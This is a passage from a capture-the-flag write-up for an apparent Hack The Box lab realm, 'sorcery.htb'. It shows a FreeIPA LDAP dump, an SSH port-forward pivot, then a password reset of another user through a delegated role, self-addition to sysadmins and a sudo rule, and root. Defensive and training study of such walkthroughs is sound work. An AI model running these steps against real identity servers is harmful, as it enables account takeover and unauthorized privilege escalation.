dn: cn=CAcert,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: pkiCA
objectClass: top
cn: CAcert
cACertificate;binary:: MIIESjCCArKgAwIBAgIBATANBgkqhkiG9w0BAQsFADA2MRQwEgYDVQQ
...
# SORCERY.HTB IPA CA, certificates, ipa, etc, sorcery.htb
dn: cn=SORCERY.HTB IPA CA,cn=certificates,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: ipaCertificate
objectClass: pkiCA
objectClass: ipaKeyPolicy
objectClass: top
cn: SORCERY.HTB IPA CA
ipaCertSubject: CN=Certificate Authority,O=SORCERY.HTB
ipaCertIssuerSerial: CN=Certificate Authority,O=SORCERY.HTB;1
ipaPublicKey:: MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAyF/f65xt1aLvODd/gqa
n2t30L5YUA7WGnKpZdRyFaRmHGvKUFZ86M65a1KM2rrIPdz1lwsYtwUjOc+49QgAuxYfHWATopM8I
...
ipaKeyTrust: trusted
ipaKeyExtUsage: 1.3.6.1.5.5.7.3.2
ipaKeyExtUsage: 1.3.6.1.5.5.7.3.1
ipaKeyExtUsage: 1.3.6.1.5.5.7.3.4
ipaKeyExtUsage: 1.3.6.1.5.5.7.3.3
ipaConfigString: ipaCa
ipaConfigString: compatCA
# sig/dc01.sorcery.htb, dogtag, custodia, ipa, etc, sorcery.htb
dn: cn=sig/dc01.sorcery.htb,cn=dogtag,cn=custodia,cn=ipa,cn=etc,dc=sorcery,dc=
htb
objectClass: nsContainer
objectClass: ipaKeyPolicy
objectClass: ipaPublicKeyObject
objectClass: groupOfPrincipals
objectClass: top
cn: sig/dc01.sorcery.htb
# enc/dc01.sorcery.htb, dogtag, custodia, ipa, etc, sorcery.htb
dn: cn=enc/dc01.sorcery.htb,cn=dogtag,cn=custodia,cn=ipa,cn=etc,dc=sorcery,dc=
htb
objectClass: nsContainer
objectClass: ipaKeyPolicy
objectClass: ipaPublicKeyObject
objectClass: groupOfPrincipals
objectClass: top
cn: enc/dc01.sorcery.htb
# anonymous-limits, etc, sorcery.htb
dn: cn=anonymous-limits,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: anonymous-limits
# Kerberos Service Password Policy, SORCERY.HTB, kerberos, sorcery.htb
dn: cn=Kerberos Service Password Policy,cn=SORCERY.HTB,cn=kerberos,dc=sorcery,
dc=htb
objectClass: nsContainer
objectClass: top
cn: Kerberos Service Password Policy
# cosTemplates, computers, accounts, sorcery.htb
dn: cn=cosTemplates,cn=computers,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: cosTemplates
# cosTemplates, services, accounts, sorcery.htb
dn: cn=cosTemplates,cn=services,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: cosTemplates
# cosTemplates, SORCERY.HTB, kerberos, sorcery.htb
dn: cn=cosTemplates,cn=SORCERY.HTB,cn=kerberos,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: cosTemplates
# Default Password Policy, cosTemplates, SORCERY.HTB, kerberos, sorcery.htb
dn: cn=Default Password Policy,cn=cosTemplates,cn=SORCERY.HTB,cn=kerberos,dc=s
orcery,dc=htb
objectClass: top
objectClass: cosTemplate
objectClass: extensibleObject
objectClass: krbContainer
cn: Default Password Policy
# cosTemplates, sysaccounts, etc, sorcery.htb
dn: cn=cosTemplates,cn=sysaccounts,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: cosTemplates
# profile, sorcery.htb
dn: ou=profile,dc=sorcery,dc=htb
objectClass: top
objectClass: organizationalUnit
ou: profiles
ou: profile
# default, profile, sorcery.htb
dn: cn=default,ou=profile,dc=sorcery,dc=htb
objectClass: top
objectClass: DUAConfigProfile
defaultServerList: dc01.sorcery.htb
defaultSearchBase: dc=sorcery,dc=htb
authenticationMethod: none
searchTimeLimit: 15
cn: default
serviceSearchDescriptor: passwd:cn=users,cn=accounts,dc=sorcery,dc=htb
serviceSearchDescriptor: group:cn=groups,cn=compat,dc=sorcery,dc=htb
bindTimeLimit: 5
objectclassMap: shadow:shadowAccount=posixAccount
followReferrals: TRUE
# provisioning, sorcery.htb
dn: cn=provisioning,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: provisioning
# accounts, provisioning, sorcery.htb
dn: cn=accounts,cn=provisioning,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: accounts
# staged users, accounts, provisioning, sorcery.htb
dn: cn=staged users,cn=accounts,cn=provisioning,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: staged users
# deleted users, accounts, provisioning, sorcery.htb
dn: cn=deleted users,cn=accounts,cn=provisioning,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: deleted users
# retrieve certificate, virtual operations, etc, sorcery.htb
dn: cn=retrieve certificate,cn=virtual operations,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: retrieve certificate
# request certificate, virtual operations, etc, sorcery.htb
dn: cn=request certificate,cn=virtual operations,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: request certificate
# request certificate different host, virtual operations, etc, sorcery.htb
dn: cn=request certificate different host,cn=virtual operations,cn=etc,dc=sorc
ery,dc=htb
objectClass: top
objectClass: nsContainer
cn: request certificate different host
# certificate status, virtual operations, etc, sorcery.htb
dn: cn=certificate status,cn=virtual operations,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: certificate status
# revoke certificate, virtual operations, etc, sorcery.htb
dn: cn=revoke certificate,cn=virtual operations,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: revoke certificate
# certificate remove hold, virtual operations, etc, sorcery.htb
dn: cn=certificate remove hold,cn=virtual operations,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: certificate remove hold
# request certificate ignore caacl, virtual operations, etc, sorcery.htb
dn: cn=request certificate ignore caacl,cn=virtual operations,cn=etc,dc=sorcer
y,dc=htb
objectClass: top
objectClass: nsContainer
cn: request certificate ignore caacl
# idp, sorcery.htb
dn: cn=idp,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: idp
# otp, sorcery.htb
dn: cn=otp,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: otp
# radiusproxy, sorcery.htb
dn: cn=radiusproxy,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: radiusproxy
# Realm Domains, ipa, etc, sorcery.htb
dn: cn=Realm Domains,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: domainRelatedObject
objectClass: nsContainer
objectClass: top
cn: Realm Domains
# trust admins, groups, accounts, sorcery.htb
dn: cn=trust admins,cn=groups,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: groupofnames
objectClass: ipausergroup
objectClass: nestedgroup
objectClass: ipaobject
cn: trust admins
description: Trusts administrators group
ipaUniqueID: 9534bbe8-96eb-11ef-8555-0242ac170002
# trusts, sorcery.htb
dn: cn=trusts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: trusts
# views, accounts, sorcery.htb
dn: cn=views,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: views
# certmap, sorcery.htb
dn: cn=certmap,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
objectClass: ipaCertMapConfigObject
cn: certmap
# certmaprules, certmap, sorcery.htb
dn: cn=certmaprules,cn=certmap,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: certmaprules
# passkeyconfig, etc, sorcery.htb
dn: cn=passkeyconfig,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nscontainer
objectClass: ipaPasskeyConfigObject
cn: passkeyconfig
# subids, accounts, sorcery.htb
dn: cn=subids,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: subids
# ad, trusts, sorcery.htb
dn: cn=ad,cn=trusts,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: cn
cn: ad
# ad, etc, sorcery.htb
dn: cn=ad,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: cn
cn: ad
# sorcery.htb, ad, etc, sorcery.htb
dn: cn=sorcery.htb,cn=ad,cn=etc,dc=sorcery,dc=htb
objectClass: ipaNTDomainAttrs
objectClass: nsContainer
objectClass: top
cn: sorcery.htb
# Default SMB Group, groups, accounts, sorcery.htb
dn: cn=Default SMB Group,cn=groups,cn=accounts,dc=sorcery,dc=htb
cn: Default SMB Group
description: Fallback group for primary group RID, do not add users to this gr
oup
objectClass: top
objectClass: ipaobject
objectClass: posixgroup
objectClass: ipantgroupattrs
ipaUniqueID: 9dd5dd0e-96eb-11ef-9b17-0242ac170002
gidNumber: 1638400001
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-1001
# donna_adams, users, accounts, sorcery.htb
dn: uid=donna_adams,cn=users,cn=accounts,dc=sorcery,dc=htb
givenName: donna
sn: adams
uid: donna_adams
cn: donna adams
displayName: donna adams
initials: da
gecos: donna adams
objectClass: top
objectClass: person
objectClass: organizationalperson
objectClass: inetorgperson
objectClass: inetuser
objectClass: posixaccount
objectClass: krbprincipalaux
objectClass: krbticketpolicyaux
objectClass: ipaobject
objectClass: ipasshuser
objectClass: ipaSshGroupOfPubKeys
objectClass: mepOriginEntry
objectClass: ipantuserattrs
loginShell: /bin/sh
homeDirectory: /home/donna_adams
uidNumber: 1638400003
gidNumber: 1638400003
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-1003
# donna_adams, groups, accounts, sorcery.htb
dn: cn=donna_adams,cn=groups,cn=accounts,dc=sorcery,dc=htb
objectClass: posixgroup
objectClass: ipaobject
objectClass: mepManagedEntry
objectClass: top
cn: donna_adams
gidNumber: 1638400003
description: User private group for donna_adams
mepManagedBy: uid=donna_adams,cn=users,cn=accounts,dc=sorcery,dc=htb
ipaUniqueID: c61201ee-96eb-11ef-ace5-0242ac170002
# ash_winter, users, accounts, sorcery.htb
dn: uid=ash_winter,cn=users,cn=accounts,dc=sorcery,dc=htb
givenName: ash
sn: winter
uid: ash_winter
cn: ash winter
displayName: ash winter
initials: aw
gecos: ash winter
objectClass: top
objectClass: person
objectClass: organizationalperson
objectClass: inetorgperson
objectClass: inetuser
objectClass: posixaccount
objectClass: krbprincipalaux
objectClass: krbticketpolicyaux
objectClass: ipaobject
objectClass: ipasshuser
objectClass: ipaSshGroupOfPubKeys
objectClass: mepOriginEntry
objectClass: ipantuserattrs
loginShell: /bin/sh
homeDirectory: /home/ash_winter
uidNumber: 1638400004
gidNumber: 1638400004
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-1004
# ash_winter, groups, accounts, sorcery.htb
dn: cn=ash_winter,cn=groups,cn=accounts,dc=sorcery,dc=htb
objectClass: posixgroup
objectClass: ipaobject
objectClass: mepManagedEntry
objectClass: top
cn: ash_winter
gidNumber: 1638400004
description: User private group for ash_winter
mepManagedBy: uid=ash_winter,cn=users,cn=accounts,dc=sorcery,dc=htb
ipaUniqueID: c86a5860-96eb-11ef-9f47-0242ac170002
# sysadmins, groups, accounts, sorcery.htb
dn: cn=sysadmins,cn=groups,cn=accounts,dc=sorcery,dc=htb
cn: sysadmins
objectClass: top
objectClass: groupofnames
objectClass: nestedgroup
objectClass: ipausergroup
objectClass: ipaobject
objectClass: posixgroup
objectClass: ipantgroupattrs
ipaUniqueID: d038b410-96eb-11ef-ace5-0242ac170002
gidNumber: 1638400005
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-1005The search base dc=sorcery,dc=htb contains every IPA subtree ( users, groups, hosts, sudo, HBAC ), proving the box is joined to a Free IPA realm called SORCERY.HTB whose LDAP/Kerberos single-sign-on back-end is reachable at dc01.sorcery.htb.
The dump shows real user entries:
| uid | uidNumber | Private group | Notes |
|---|---|---|---|
| donna_adams | 1638400003 | cn=donna_adams | The owned user. |
| ash_winter | 1638400004 | cn=ash_winter | Another normal user. |
| admin | 1638400000 | — | Built-in realm-wide administrator. |
Free IPA Web UI
We can pivot to the browser-based control-panel that every IPA server exposes.
| URL | Protocol | Notes |
|---|---|---|
| https://dc01.sorcery.htb/ipa/ui/ | HTTPS (9443 if port-mapped in Docker; otherwise default 443) | Uses the same Kerberos/LDAP backend; self-signed CA issued by SORCERY.HTB IPA CA. |
Check /etc/hosts:
127.0.0.1 localhost main.sorcery.htb sorcery sorcery.htb
127.0.1.1 ubuntu-2404
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.23.0.2 dc01.sorcery.htbdc01.sorcery.htb lives on the internal 172.23.0.0/24 Docker-bridge network; the address is only routable from the target host main.sorcery.htb.
Do a quick nmap scan:
PORT STATE SERVICE
80/tcp open http
88/tcp open kerberos
389/tcp open ldap
443/tcp open https
464/tcp open kpasswd
636/tcp open ldaps
749/tcp open kerberos-admSo we need to pivot the HTTPS port (both 443 and 80) out:
sudo ssh \
-L 80:172.23.0.2:80 \
-L 443:172.23.0.2:443 \
[email protected]Open /etc/hosts to add:
127.0.0.1 dc01.sorcery.htbNow we can browse https://dc01.sorcery.htb:8443/ipa/ui/, and login as donna_adams:

Full access.
From here we can click around and test to find out the logged in user (
donna_admin) can modify password/certificate of another userash_winter, which we can also uncover from the following command-line enumeration.
IPA Enum
Try Kerberos login with the retrieved account:
rebecca_smith@main:/dev/shm$ kinit donna_adams
Password for [email protected]:
rebecca_smith@main:/dev/shm$ klist
Ticket cache: KEYRING:persistent:2003:2003
Default principal: [email protected]
Valid starting Expires Service principal
06/19/25 08:05:32 06/20/25 07:57:57 krbtgt/[email protected]Commands to Enumerate realm:
ipa user-find
ipa host-find
ipa sudorule-findThis will give us similar results as we uncovered earlier. But we can focus now on the compromised user donna_adams with user-show command:
donna_adams@main:~$ ipa user-show donna_adams --all --raw
dn: uid=donna_adams,cn=users,cn=accounts,dc=sorcery,dc=htb
uid: donna_adams
givenname: donna
sn: adams
cn: donna adams
initials: da
homedirectory: /home/donna_adams
gecos: donna adams
loginshell: /bin/sh
krbcanonicalname: [email protected]
krbprincipalname: [email protected]
mail: [email protected]
uidnumber: 1638400003
gidnumber: 1638400003
nsaccountlock: FALSE
has_password: TRUE
has_keytab: TRUE
displayName: donna adams
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-1003
ipaUniqueID: c60a9328-96eb-11ef-ace5-0242ac170002
krbPasswordExpiration: 20400101000000Z
memberof: ipaUniqueID=c4f41b80-96eb-11ef-9cbc-0242ac170002,cn=hbac,dc=sorcery,dc=htb
memberof: ipaUniqueID=c54549ba-96eb-11ef-9408-0242ac170002,cn=hbac,dc=sorcery,dc=htb
memberof: cn=ipausers,cn=groups,cn=accounts,dc=sorcery,dc=htb
memberofindirect: cn=change_userPassword_ash_winter_ldap,cn=permissions,cn=pbac,dc=sorcery,dc=htb
memberofindirect: cn=change_userPassword_ash_winter_ldap,cn=privileges,cn=pbac,dc=sorcery,dc=htb
memberofindirect: cn=change_userPassword_ash_winter_ldap,cn=roles,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: person
objectClass: organizationalperson
objectClass: inetorgperson
objectClass: inetuser
objectClass: posixaccount
objectClass: krbprincipalaux
objectClass: krbticketpolicyaux
objectClass: ipaobject
objectClass: ipasshuser
objectClass: ipaSshGroupOfPubKeys
objectClass: mepOriginEntry
objectClass: ipantuserattrsAs we see, donna_adams is an indirect member of a role named change_userPassword_ash_winter_ldap.
IPA ACLs
In Free IPA the chain is:
role → privileges → permissions → actual LDAP rightsSo if a user sits in (or under) a role, they inherit every permission contained in that role.
Next, we can inspect what the role really grants:
donna_adams@main:~$ ipa role-show "change_userPassword_ash_winter_ldap" --all
ipa: ERROR: change_userPassword_ash_winter_ldap: permission not found
ash_winter@main:~$ ipa privilege-show "change_userPassword_ash_winter_ldap" --all
ipa: ERROR: change_userPassword_ash_winter_ldap: privilege not found
ash_winter@main:~$ ipa permission-find change_userPassword_ash_winter_ldap
---------------------
0 permissions matched
---------------------
----------------------------
Number of entries returned 0
----------------------------It looks like it's a custom "indirect" role without being documented, while it does exist proven by querying LDAP:
donna_adams@main:~$ ldapsearch -x -H ldap://dc01.sorcery.htb \
-b "cn=roles,cn=accounts,dc=sorcery,dc=htb" \
"(cn=change_userPassword_ash_winter_ldap)"
# extended LDIF
#
# LDAPv3
# base <cn=roles,cn=accounts,dc=sorcery,dc=htb> with scope subtree
# filter: (cn=change_userPassword_ash_winter_ldap)
# requesting: ALL
#
# search result
search: 2
result: 0 Success
# numResponses: 1Never mind. Its group name tells us everything. Because the permission is already there, the write will work immediately:
donna_adams@main:~$ ipa user-mod ash_winter --password
Password:
Enter Password again to verify:
--------------------------
Modified user "ash_winter"
--------------------------
User login: ash_winter
First name: ash
Last name: winter
Home directory: /home/ash_winter
Login shell: /bin/sh
Principal name: [email protected]
Principal alias: [email protected]
Email address: [email protected]
UID: 1638400004
GID: 1638400004
Account disabled: False
Password: True
Member of groups: ipausers
Member of HBAC rule: allow_ssh, allow_sudo
Indirect Member of role: add_sysadmin
Kerberos keys available: TrueWe have successfully modified its password.
IPA Sudo
Modified user "ash_winter"
…
Indirect Member of role: add_sysadmin
Member of HBAC rule: allow_ssh, allow_sudoThat single line “Indirect Member of role : add_sysadmin” is the key to rooting the box.
Log in as ash_winter (via kinit to get a TGT or SSH):

Again, the name of this custom privilege tells us straight forward, that we are able to add members (or ourselves) to the admin group (namely, add_sysadmin privilege ⇒ write access to group sysadmins):
ash_winter@main:~$ ipa group-add-member sysadmins --users=ash_winter
Group name: sysadmins
GID: 1638400005
Member users: ash_winter
Indirect Member of role: manage_sudorules_ldap
-------------------------
Number of members added 1
-------------------------There, we uncover another Indirect Member of role: manage_sudorules_ldap.
Drop our user explicitly into the universal rule allow_sudo to become a brother of the admin user:
ash_winter@main:~$ ipa sudorule-add-user allow_sudo --users=ash_winter
Rule name: allow_sudo
Enabled: True
Host category: all
Command category: all
RunAs User category: all
RunAs Group category: all
Users: admin, ash_winter
-------------------------
Number of members added 1
-------------------------Restart SSSD to flush the cache instantly and make the new configs come into play:
sudo /usr/bin/systemctl restart sssdRun commands to escalate privilege like sudo su, sudo su -, sudo -i — rooted:

Comments | NOTHING